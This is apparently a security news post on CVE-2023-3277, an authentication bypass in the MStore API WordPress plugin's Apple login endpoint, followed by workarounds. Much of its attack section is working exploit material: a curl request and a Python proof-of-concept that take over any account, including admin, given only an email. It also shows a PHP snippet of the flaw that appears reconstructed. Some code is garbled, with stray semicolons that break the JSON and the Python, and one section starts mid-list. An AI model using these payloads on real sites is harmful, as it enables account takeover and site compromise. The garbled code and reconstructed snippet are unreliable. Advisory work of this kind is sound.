CVE CyberSecurity Database News

CVE-2023-3277 - Critical Unauthorized Account Access and Privilege Escalation Vulnerability in MStore API WordPress Plugin

Poster -

Summary:
A vulnerability (CVE-2023-3277) has been found in the popular MStore API WordPress plugin (versions up to and including 4.10.7). This flaw allows attackers to bypass authentication and gain unauthorized access to any WordPress user account — including admin accounts — simply by knowing the target’s email address. The root of the problem is in the flawed implementation of the "Apple login" feature. The plugin author has not issued a security patch, despite regular updates and a responsible disclosure 30 days ago. This post breaks down the issue, provides code insight, and offers mitigation guidance.

What is the MStore API Plugin?

MStore API is a widely-used WordPress plugin connecting native mobile apps like those built with InspireUI's MStore to WooCommerce stores. It enables user authentication, product browsing, orders, and more — making it a high-value target for attackers.

Vulnerability Details

Vulnerable Versions: Up to and including 4.10.7
Patched Version: _None as of publication_
CVE ID: CVE-2023-3277
Impact: Account takeover, privilege escalation, full-site compromise possible.

Root Cause: Apple Login Misimplementation

The plugin lets users sign in with "Sign in with Apple," but doesn't verify the authenticity of the Apple ID token received from the client. Instead, it just trusts whatever email the client supplies — no cryptographic validation at all.

Step 1: Gather a Target’s Email

Any attacker needs is the WordPress user’s email address. For WooCommerce shops, customer emails are often easy to guess or enumerate.

Step 2: Send a Fake Login Request

The attacker crafts a bogus Apple login API request with the victim's email. The server, failing to verify, creates a valid login session for that email.

Example Exploit Request

curl -X POST https://victim.com/wp-json/api/v1/applelogin \
  -H 'Content-Type: application/json' \
  -d '{
        "email": "admin@victim.com",
        "userName": "JohnDoe",
        "photo": "http://whatever.com/avatar.jpg";,
        "appleToken": "any-string-or-empty"
      }'

That’s it! The server then logs the attacker in as the admin user (admin@victim.com) or any registered user they choose.

Full Exploit Chain

No Apple account needed
No token validation
No password
No additional checks.

Proof-of-Concept (PoC): Python Example

Below is a basic Python script demonstrating the exploit.

import requests

URL = "https://victim.com/wp-json/api/v1/applelogin"
EMAIL = "admin@victim.com"

data = {
    "email": EMAIL,
    "userName": "HackedByScript",
    "photo": "http://example.com/any.jpg";,
    "appleToken": "fake"
}

response = requests.post(URL, json=data)
print("Status Code:", response.status_code)
print("Response:", response.text)

If successful, the response contains a login token or cookie, giving the attacker session access.

In the plugin’s PHP

// This is somewhere inside the MStore API plugin
$email     = sanitize_email($request->get_param('email'));
$user      = get_user_by('email', $email);

if (!$user) {
    // create new user
    ...
    $user = get_user_by('email', $email);
}

wp_signon(array(
    'user_login' => $user->user_login,
    'user_password' => null, // <-- Doesn't check password or real apple token!
    'remember' => true
));

Notably, there is zero verification of the Apple token. The server trusts the client completely.

Personal Data Exposure: Exfiltrate user data, reset passwords, or escalate further.

- SEO Spam or Malware Hosting: With admin access, attackers can plant malicious plugins or spam content.

Temporary Workarounds

1. Disable Apple Login in MStore App: If you use MStore API, immediately disable the Apple login feature. Often you can change or comment out the related route in /wp-content/plugins/mstore-api code.
2. Block the API Route: Use a WAF/firewall or security plugin to block POST requests to /wp-json/api/v1/applelogin.

References

- WordPress Plugin Directory: MStore API
- Original Disclosure Report (if available)
- Understanding "Sign In with Apple" Security
- Improper Authentication Common Weakness

Summary

CVE-2023-3277 in MStore API lets attackers log in as any WordPress user simply by knowing their email, due to a broken Apple login process. Patch absent as of now — site owners running MStore API must take immediate defensive steps.

For more technical advice or assistance mitigating this vulnerability, leave a comment below or contact a trusted WordPress security provider.

Timeline

Published on: 11/03/2023 12:15:08 UTC
Last modified on: 11/13/2023 18:30:53 UTC